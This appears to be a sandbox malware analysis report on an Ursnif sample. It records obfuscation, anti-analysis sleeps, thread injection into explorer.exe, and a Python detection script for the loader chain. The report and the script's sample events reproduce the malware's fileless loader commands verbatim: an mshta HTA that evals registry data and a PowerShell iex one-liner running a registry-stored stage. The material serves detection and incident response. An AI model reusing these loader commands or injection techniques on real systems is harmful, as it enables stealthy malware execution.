Source: Binary string: ntdll.pdbUGP | source: regsvr32.exe, 00000003.00000003.1097720153.0000000005940000.00000004.00000001.sdmp
Source: Binary string: rundll32.pdb | source: control.exe, 0000000F.00000002.1162697674.0000025432BBC000.00000004.00000040.sdmp
Source: Binary string: rundll32.pdbGCTL | source: control.exe, 0000000F.00000002.1162697674.0000025432BBC000.00000004.00000040.sdmp
Source: Binary string: wscui.pdb | source: explorer.exe, 00000010.00000000.1133425764.0000000007010000.00000002.00000001.sdmp

Data Obfuscation:

Suspicious powershell command line found
Source: unknown | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\27F8DA9B-5A17-F1FE-9C4B-2EB590AF42B9').BingckDS))
Source: C:\Windows\System32\mshta.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\27F8DA9B-5A17-F1FE-9C4B-2EB590AF42B9').BingckDS))
Contains functionality to dynamically determine API calls
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 3_2_05146450 LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress, 3_2_05146450
Uses code obfuscation techniques (call, push, ret)
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 3_2_05156D07 push ecx; ret 3_2_05156D17
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 3_2_051569A0 push ecx; ret 3_2_051569A9
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 3_2_0515BA4E push ds; retn 0002h 3_2_0515BA69
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 3_2_0515BA74 push edx; retn 0002h 3_2_0515BA75
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 3_2_0515BA98 push edx; ret 3_2_0515BAAD
Source: C:\Windows\System32\control.exe | Code function: 15_2_00C1B849 push 3B000001h; retf 15_2_00C1B84E
Source: C:\Windows\System32\rundll32.exe | Code function: 18_2_000001337411B849 push 3B000001h; retf 18_2_000001337411B84E
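The process chain recorded under "Spawns processes" (wscript.exe registering a .txt from Temp through regsvr32.exe, the 32-bit regsvr32.exe launching mshta.exe with an inline about: HTA that eval()s a registry value, and mshta.exe launching powershell.exe to iex another value of the same GUID-named key) and the PowerShell one-liner flagged here are the parts of this report a detection engineer turns into rules first. The Python below is an added example written for this page; it is not Joe Sandbox output and not code from the sample. It replays the report's command lines as constructed process-creation records (the parent of wscript.exe is assumed to be explorer.exe, which the report lists as unknown, and a benign regsvr32 invocation is added as a control), applies hand-written rules whose thresholds, extension list and user-writable-directory list are this example's assumptions, and extracts every registry key and value name the chain reads code from, which is where the fileless stage of this sample lives.

```python
import re
from collections import defaultdict
from dataclasses import dataclass
from pathlib import PureWindowsPath


@dataclass(frozen=True)
class ProcEvent:
    parent: str    # image path of the creating process
    image: str     # image path of the created process
    cmdline: str   # command line exactly as logged


# Constructed process-creation records: command lines copied from the "Spawns processes"
# section of the report, plus one benign regsvr32 invocation the rules must not flag.
SAMPLE_EVENTS = [
    ProcEvent(r"C:\Windows\explorer.exe", r"C:\Windows\System32\wscript.exe",
              r"C:\Windows\System32\wscript.exe 'C:\Users\user\Desktop\view_attach_b8x.js'"),
    ProcEvent(r"C:\Windows\System32\wscript.exe", r"C:\Windows\System32\regsvr32.exe",
              r"'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\\iUBu.txt"),
    ProcEvent(r"C:\Windows\System32\regsvr32.exe", r"C:\Windows\SysWOW64\regsvr32.exe",
              r"-s C:\Users\user\AppData\Local\Temp\\iUBu.txt"),
    ProcEvent(r"C:\Windows\SysWOW64\regsvr32.exe", r"C:\Windows\System32\mshta.exe",
              r"""'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>resizeTo(1,1);eval(new ActiveXObject('WScript.Shell').RegRead('HKCU\\Software\\AppDataLow\\Software\\Microsoft\\27F8DA9B-5A17-F1FE-9C4B-2EB590AF42B9\\Analager'));if(!window.flag)close()</script>'"""),
    ProcEvent(r"C:\Windows\System32\mshta.exe", r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r"""'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\27F8DA9B-5A17-F1FE-9C4B-2EB590AF42B9').BingckDS))"""),
    ProcEvent(r"C:\Windows\SysWOW64\regsvr32.exe", r"C:\Windows\System32\control.exe",
              r"C:\Windows\system32\control.exe /?"),
    ProcEvent(r"C:\Windows\explorer.exe", r"C:\Windows\System32\regsvr32.exe",
              r'regsvr32.exe /s "C:\Program Files\Vendor\plugin.dll"'),   # benign control (constructed)
]

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "mshta.exe", "powershell.exe"}
REGSVR32_EXTS = {".dll", ".ocx", ".ax", ".cpl"}            # what regsvr32 normally registers (assumption)
USER_WRITABLE = ("\\appdata\\local\\temp\\", "\\appdata\\roaming\\", "\\users\\public\\", "\\programdata\\")
# Matches HKCU:Software\..., HKCU\\Software\\... or HKEY_CURRENT_USER\... up to the closing quote/paren.
REG_REF = re.compile(r"(HK(?:CU|LM|EY_CURRENT_USER|EY_LOCAL_MACHINE))(?::|\\+)([^'\"()]+)", re.I)


def _base(path):
    return PureWindowsPath(path.strip("'\"")).name.lower()


def registry_refs(cmdline):
    """(key, value_name) pairs for every registry location the command line reads code from."""
    refs = []
    for m in REG_REF.finditer(cmdline):
        hive = {"HKEY_CURRENT_USER": "HKCU", "HKEY_LOCAL_MACHINE": "HKLM"}.get(m.group(1).upper(), m.group(1).upper())
        path = hive + "\\" + re.sub(r"\\+", r"\\", m.group(2)).rstrip("\\")   # collapse JS-escaped '\\'
        prop = re.match(r"['\"]?\)\s*\.(\w+)", cmdline[m.end():])            # (gp 'KEY').Value
        if prop:
            refs.append((path, prop.group(1)))
        elif "regread(" in cmdline[:m.start()].lower():                      # RegRead('KEY\Value')
            key, _, value = path.rpartition("\\")
            refs.append((key, value))
        else:
            refs.append((path, None))
    return refs


def assess(ev):
    """Reasons (possibly none) why one process-creation event matches this loader chain."""
    img, parent, low = _base(ev.image), _base(ev.parent), ev.cmdline.lower()
    reasons = []
    if img == "regsvr32.exe":
        # Only the '/s <module>' (or '-s') form is parsed; an assumption for this example.
        m = re.search(r"""(?:^|\s)[-/]s\s+("[^"]+"|'[^']+'|\S+)""", ev.cmdline)
        if m:
            target = m.group(1).strip("'\"")
            ext = PureWindowsPath(target).suffix.lower()
            if ext not in REGSVR32_EXTS:
                reasons.append(f"regsvr32 registers a module with extension '{ext}' instead of a DLL: {target}")
            if any(d in target.lower() for d in USER_WRITABLE):
                reasons.append("regsvr32 module is in a user-writable directory")
        if parent in SCRIPT_HOSTS:
            reasons.append(f"regsvr32 spawned by script host {parent}")
    elif img == "mshta.exe":
        if re.search(r"\b(about|javascript|vbscript):", low):
            reasons.append("mshta executes inline script instead of an .hta file")
        if "regread(" in low:
            reasons.append("mshta evaluates code read from a registry value")
    elif img == "powershell.exe":
        if re.search(r"\b(iex|invoke-expression)\b", low) and re.search(r"\b(gp|get-itemproperty)\b", low):
            reasons.append("powershell Invoke-Expression on data read from the registry")
        if parent in SCRIPT_HOSTS:
            reasons.append(f"powershell spawned by script host {parent}")
    # 64-bit regsvr32 legitimately re-launches its SysWOW64 twin for 32-bit modules; any other child is unusual.
    if parent == "regsvr32.exe" and img != "regsvr32.exe":
        reasons.append(f"{img} spawned by regsvr32.exe")
    return reasons


def triage(events):
    """Flag events and collect the registry key/value names the chain reads its next stage from."""
    flagged, code_locations = [], defaultdict(set)
    for ev in events:
        reasons = assess(ev)
        if reasons:
            flagged.append((_base(ev.image), reasons))
        for key, value in registry_refs(ev.cmdline):
            code_locations[key].add(value)
    return flagged, dict(code_locations)


if __name__ == "__main__":
    flagged, locations = triage(SAMPLE_EVENTS)
    for image, reasons in flagged:
        print(f"{image}: " + "; ".join(reasons))
    for key, values in locations.items():
        print(f"registry-resident stage: {key} -> {sorted(v or '(default)' for v in values)}")
```

Run stand-alone, it flags both regsvr32.exe instances, mshta.exe, powershell.exe and control.exe while leaving the benign regsvr32 control and wscript.exe alone, and it resolves both the mshta RegRead path and the PowerShell Get-ItemProperty path to the same key, HKCU\Software\AppDataLow\Software\Microsoft\27F8DA9B-5A17-F1FE-9C4B-2EB590AF42B9, with the value names Analager and BingckDS. That key is what to export from an infected host during response, since the stages the sandbox only saw in memory are stored there rather than on disk.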

Hooking and other Techniques for Hiding and Protection:

Yara detected Ursnif
Source: Yara match | File source: 00000003.00000003.974215448.00000000050D8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000014.00000002.1187145561.000001C7D569E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000003.1010236467.0000000004F5B000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000012.00000002.1158916557.000001337413E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.1164687084.0000000005130000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000003.974824363.00000000050D8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000003.974371336.00000000050D8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000003.974507500.00000000050D8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000003.974637108.00000000050D8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 0000000F.00000003.1101073762.0000025430CB0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000012.00000003.1154798973.00000133741C0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000000F.00000002.1156601270.0000000000C3E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000003.974737633.00000000050D8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000003.974879691.00000000050D8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000003.1091761410.00000000008E0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000003.974931290.00000000050D8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: regsvr32.exe PID: 1836, type: MEMORY
Source: Yara match | File source: Process Memory Space: control.exe PID: 3720, type: MEMORY
Source: Yara match | File source: Process Memory Space: rundll32.exe PID: 5664, type: MEMORY
Source: Yara match | File source: Process Memory Space: RuntimeBroker.exe PID: 4052, type: MEMORY
Disables application error messsages (SetErrorMode)Show sources
Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\control.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe | Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion:

Contains long sleeps (>= 3 min)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
Found WSH timer for Javascript or VBS script (likely evasive script)
Source: C:\Windows\System32\wscript.exe | Window found: window name: WSH-Timer
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 6550
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 1730
Found large amount of non-executed APIs
Source: C:\Windows\SysWOW64\regsvr32.exe | API coverage: 7.2 %
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2976 | Thread sleep time: -922337203685477s >= -30000s
Contains functionality to enumerate / list files inside a directory
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 3_2_0513CDF2 lstrlenW,FindFirstFileW,lstrlenW,RemoveDirectoryW,DeleteFileW,FindNextFileW,GetLastError
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 3_2_0514940E RtlAllocateHeap,RtlAllocateHeap,RtlAllocateHeap,memset,CreateFileA,GetFileTime,CloseHandle,StrRChrA,lstrcat,FindFirstFileA,FindFirstFileA,CompareFileTime,CompareFileTime,FindClose,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,StrChrA,memcpy,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,FindClose,HeapFree,HeapFree
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 3_2_05138181 lstrlenW,lstrlenW,lstrlenW,lstrlenW,memset,FindFirstFileW,lstrlenW,lstrlenW,memset,wcscpy,PathFindFileNameW,RtlEnterCriticalSection,RtlLeaveCriticalSection,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,FindFirstFileW,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose
Contains functionality to query local drives
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 3_2_05147CDC wcscpy,wcscpy,GetLogicalDriveStringsW,GetLogicalDriveStringsW,RtlAllocateHeap,memset,GetLogicalDriveStringsW,WaitForSingleObject,GetDriveTypeW,lstrlenW,wcscpy,lstrlenW,HeapFree
May try to detect the virtual machine to hinder analysis (VM artifact strings found in memory)
Source: explorer.exe, 00000010.00000000.1134184918.0000000007340000.00000002.00000001.sdmp | Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: explorer.exe, 00000010.00000000.1134184918.0000000007340000.00000002.00000001.sdmp | Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: explorer.exe, 00000010.00000000.1134184918.0000000007340000.00000002.00000001.sdmp | Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: explorer.exe, 00000010.00000000.1134184918.0000000007340000.00000002.00000001.sdmp | Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
Program exit points
Source: C:\Windows\SysWOW64\regsvr32.exe | API call chain: ExitProcess graph end node
Queries a list of all running processes
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information queried: ProcessInformation

Anti Debugging:

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 3_2_05138560 LdrInitializeThunk,GetModuleHandleA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress
Contains functionality to dynamically determine API calls
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 3_2_05146450 LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress
Contains functionality to register its own exception handler
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 3_2_0513C0D6 ConvertStringSecurityDescriptorToSecurityDescriptorA,StrRChrA,_strupr,lstrlen,LdrInitializeThunk,CreateEventA,RtlAddVectoredExceptionHandler,GetLastError,RtlRemoveVectoredExceptionHandler

HIPS / PFW / Operating System Protection Evasion:

Allocates memory in foreign processes
Source: C:\Windows\SysWOW64\regsvr32.exe | Memory allocated: C:\Windows\System32\control.exe base: CC0000 protect: page execute and read and write
Source: C:\Windows\System32\control.exe | Memory allocated: C:\Windows\explorer.exe base: 25F0000 protect: page execute and read and write
Source: C:\Windows\System32\control.exe | Memory allocated: C:\Windows\System32\rundll32.exe base: 13373E90000 protect: page execute and read and write
Source: C:\Windows\explorer.exe | Memory allocated: C:\Windows\System32\RuntimeBroker.exe base: 1F26FDE0000 protect: page execute and read and write
Source: C:\Windows\explorer.exe | Memory allocated: C:\Windows\System32\RuntimeBroker.exe base: 2DB879C0000 protect: page execute and read and write
Changes memory attributes in foreign processes to executable or writable
Source: C:\Windows\System32\control.exe | Memory protected: C:\Windows\explorer.exe base: 7FF7352A1000 protect: page execute and read and write
Source: C:\Windows\System32\control.exe | Memory protected: C:\Windows\explorer.exe base: 7FF7352A1000 protect: page execute read
Source: C:\Windows\System32\control.exe | Memory protected: C:\Windows\explorer.exe base: 7FF7352A1000 protect: page execute and read and write
Source: C:\Windows\explorer.exe | Memory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FF703D51000 protect: page execute and read and write
Source: C:\Windows\explorer.exe | Memory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FF703D51000 protect: page execute read
Source: C:\Windows\explorer.exe | Memory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FF703D51000 protect: page execute and read and write
Source: C:\Windows\explorer.exe | Memory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FF703D51000 protect: page execute and read and write
Source: C:\Windows\explorer.exe | Memory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FF703D51000 protect: page execute read
Source: C:\Windows\explorer.exe | Memory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FF703D51000 protect: page execute and read and write
Creates a thread in another existing process (thread injection)
Source: C:\Windows\System32\control.exe | Thread created: C:\Windows\explorer.exe EIP: 352A1000
Source: C:\Windows\explorer.exe | Thread created: C:\Windows\System32\RuntimeBroker.exe EIP: 3D51000
Source: C:\Windows\explorer.exe | Thread created: C:\Windows\System32\RuntimeBroker.exe EIP: 3D51000
Source: C:\Windows\explorer.exe | Thread created: C:\Windows\System32\RuntimeBroker.exe EIP: 3D51000
Injects code into the Windows Explorer (explorer.exe)
Source: C:\Windows\System32\control.exe | Memory written: PID: 2928 base: 7FF7352A1000 value: EB
Source: C:\Windows\System32\control.exe | Memory written: PID: 2928 base: 25F0000 value: 00
Source: C:\Windows\System32\control.exe | Memory written: PID: 2928 base: 7FF7352A1000 value: 48
Maps a DLL or memory area into another process
Source: C:\Windows\SysWOW64\regsvr32.exe | Section loaded: unknown target: C:\Windows\System32\control.exe protection: execute and read and write
Source: C:\Windows\System32\control.exe | Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Source: C:\Windows\System32\control.exe | Section loaded: unknown target: C:\Windows\System32\rundll32.exe protection: execute and read and write
Source: C:\Windows\explorer.exe | Section loaded: unknown target: C:\Windows\System32\RuntimeBroker.exe protection: execute and read and write
Source: C:\Windows\explorer.exe | Section loaded: unknown target: C:\Windows\System32\RuntimeBroker.exe protection: execute and read and write
Modifies the context of a thread in another process (thread injection)
Source: C:\Windows\SysWOW64\regsvr32.exe | Thread register set: target process: 3720
Source: C:\Windows\System32\control.exe | Thread register set: target process: 2928
Source: C:\Windows\System32\control.exe | Thread register set: target process: 5664
Source: C:\Windows\explorer.exe | Thread register set: target process: 3552
Source: C:\Windows\explorer.exe | Thread register set: target process: 3872
Writes to foreign memory regions
Source: C:\Windows\SysWOW64\regsvr32.exe | Memory written: C:\Windows\System32\control.exe base: CC0000
Source: C:\Windows\System32\control.exe | Memory written: C:\Windows\explorer.exe base: 7FF7352A1000
Source: C:\Windows\System32\control.exe | Memory written: C:\Windows\explorer.exe base: 25F0000
Source: C:\Windows\System32\control.exe | Memory written: C:\Windows\explorer.exe base: 7FF7352A1000
Source: C:\Windows\System32\control.exe | Memory written: C:\Windows\System32\rundll32.exe base: 7FF786215FD0
Source: C:\Windows\System32\control.exe | Memory written: C:\Windows\System32\rundll32.exe base: 13373E90000
Source: C:\Windows\System32\control.exe | Memory written: C:\Windows\System32\rundll32.exe base: 7FF786215FD0
Source: C:\Windows\explorer.exe | Memory written: C:\Windows\System32\RuntimeBroker.exe base: 7FF703D51000
Source: C:\Windows\explorer.exe | Memory written: C:\Windows\System32\RuntimeBroker.exe base: 1F26FDE0000
Source: C:\Windows\explorer.exe | Memory written: C:\Windows\System32\RuntimeBroker.exe base: 7FF703D51000
Source: C:\Windows\explorer.exe | Memory written: C:\Windows\System32\RuntimeBroker.exe base: 7FF703D51000
Source: C:\Windows\explorer.exe | Memory written: C:\Windows\System32\RuntimeBroker.exe base: 2DB879C0000
Source: C:\Windows\explorer.exe | Memory written: C:\Windows\System32\RuntimeBroker.exe base: 7FF703D51000
Creates a process in suspended mode (likely to inject code)
Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\regsvr32.exe 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\\iUBu.txt
Source: C:\Windows\SysWOW64\regsvr32.exe | Process created: C:\Windows\System32\mshta.exe 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>resizeTo(1,1);eval(new ActiveXObject('WScript.Shell').RegRead('HKCU\\Software\\AppDataLow\\Software\\Microsoft\\27F8DA9B-5A17-F1FE-9C4B-2EB590AF42B9\\Analager'));if(!window.flag)close()</script>'
Source: C:\Windows\SysWOW64\regsvr32.exe | Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe /?
Source: C:\Windows\System32\mshta.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\27F8DA9B-5A17-F1FE-9C4B-2EB590AF42B9').BingckDS))
Source: C:\Windows\System32\control.exe | Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL /?
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Source: unknown | Process created: C:\Windows\System32\mshta.exe 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>resizeTo(1,1);eval(new ActiveXObject('WScript.Shell').RegRead('HKCU\\Software\\AppDataLow\\Software\\Microsoft\\27F8DA9B-5A17-F1FE-9C4B-2EB590AF42B9\\Analager'));if(!window.flag)close()</script>'
Source: C:\Windows\SysWOW64\regsvr32.exe | Process created: C:\Windows\System32\mshta.exe 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>resizeTo(1,1);eval(new ActiveXObject('WScript.Shell').RegRead('HKCU\\Software\\AppDataLow\\Software\\Microsoft\\27F8DA9B-5A17-F1FE-9C4B-2EB590AF42B9\\Analager'));if(!window.flag)close()</script>'
May try to detect the Windows Explorer process (often used for injection)
Source: explorer.exe, 00000010.00000000.1117047191.0000000001170000.00000002.00000001.sdmp, RuntimeBroker.exe, 00000011.00000000.1152895092.000001F26D790000.00000002.00000001.sdmp, RuntimeBroker.exe, 00000013.00000000.1164781219.000002DB88060000.00000002.00000001.sdmp, RuntimeBroker.exe, 00000014.00000002.1184426981.000001C7D3990000.00000002.00000001.sdmp | Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000010.00000000.1117047191.0000000001170000.00000002.00000001.sdmp, RuntimeBroker.exe, 00000011.00000000.1152895092.000001F26D790000.00000002.00000001.sdmp, RuntimeBroker.exe, 00000013.00000000.1164781219.000002DB88060000.00000002.00000001.sdmp, RuntimeBroker.exe, 00000014.00000002.1184426981.000001C7D3990000.00000002.00000001.sdmp | Binary or memory string: Progman
Source: explorer.exe, 00000010.00000000.1117047191.0000000001170000.00000002.00000001.sdmp, RuntimeBroker.exe, 00000011.00000000.1152895092.000001F26D790000.00000002.00000001.sdmp, RuntimeBroker.exe, 00000013.00000000.1164781219.000002DB88060000.00000002.00000001.sdmp, RuntimeBroker.exe, 00000014.00000002.1184426981.000001C7D3990000.00000002.00000001.sdmp | Binary or memory string: hProgram ManagerWE
Source: explorer.exe, 00000010.00000000.1117047191.0000000001170000.00000002.00000001.sdmp, RuntimeBroker.exe, 00000011.00000000.1152895092.000001F26D790000.00000002.00000001.sdmp, RuntimeBroker.exe, 00000013.00000000.1164781219.000002DB88060000.00000002.00000001.sdmp, RuntimeBroker.exe, 00000014.00000002.1184426981.000001C7D3990000.00000002.00000001.sdmp | Binary or memory string: Progmanlock
Source: explorer.exe, 00000010.00000000.1115420949.0000000000A30000.00000004.00000020.sdmp | Binary or memory string: Progman{
Source: explorer.exe, 00000010.00000000.1115420949.0000000000A30000.00000004.00000020.sdmp | Binary or memory string: PProgmancci\Ap

Language, Device and Operating System Detection:

Contains functionality to query CPU information (cpuid)
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 3_2_0513733B cpuid
Queries the installation date of Windows
Source: C:\Windows\SysWOW64\regsvr32.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion InstallDate
Queries the volume information (name, serial number etc) of a device
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
Contains functionality to create pipes for IPC
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 3_2_05134134 CreateNamedPipeA,GetLastError,CloseHandle,GetLastError
Contains functionality to query local / system time
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 3_2_0514CEA7 GetSystemTimeAsFileTime,HeapCreate,NtQueryInformationThread,GetModuleHandleA,RtlExitUserThread
Contains functionality to query the account / user name
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 3_2_0513476B RtlInitializeCriticalSection,RtlInitializeCriticalSection,memset,RtlInitializeCriticalSection,CreateMutexA,GetLastError,GetLastError,CloseHandle,GetUserNameA,GetUserNameA,RtlAllocateHeap,GetUserNameA,NtQueryInformationProcess,OpenProcess,GetLastError,CloseHandle,GetShellWindow,GetWindowThreadProcessId,CreateEventA,CreateEventA,RtlAllocateHeap,OpenEventA,CreateEventA,GetLastError,GetLastError,LoadLibraryA,SetEvent,RtlAllocateHeap,wsprintfA
Contains functionality to query windows version
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 3_2_05137D9B GetVersion,LdrInitializeThunk,GetLastError
Queries the cryptographic machine GUID
Source: C:\Windows\System32\wscript.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Lowering of HIPS / PFW / Operating System Security Settings:

Overwrites Mozilla Firefox settings
Source: C:\Windows\explorer.exe | File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\6c4zjj0s.default\prefs.js

Stealing of Sensitive Information:

Yara detected Ursnif
Source: Yara match | File source: 00000003.00000003.974215448.00000000050D8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000014.00000002.1187145561.000001C7D569E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000003.1010236467.0000000004F5B000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000012.00000002.1158916557.000001337413E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.1164687084.0000000005130000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000003.974824363.00000000050D8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000003.974371336.00000000050D8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000003.974507500.00000000050D8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000003.974637108.00000000050D8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 0000000F.00000003.1101073762.0000025430CB0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000012.00000003.1154798973.00000133741C0000.00000004.00000001.sdmp, type: MEMORY
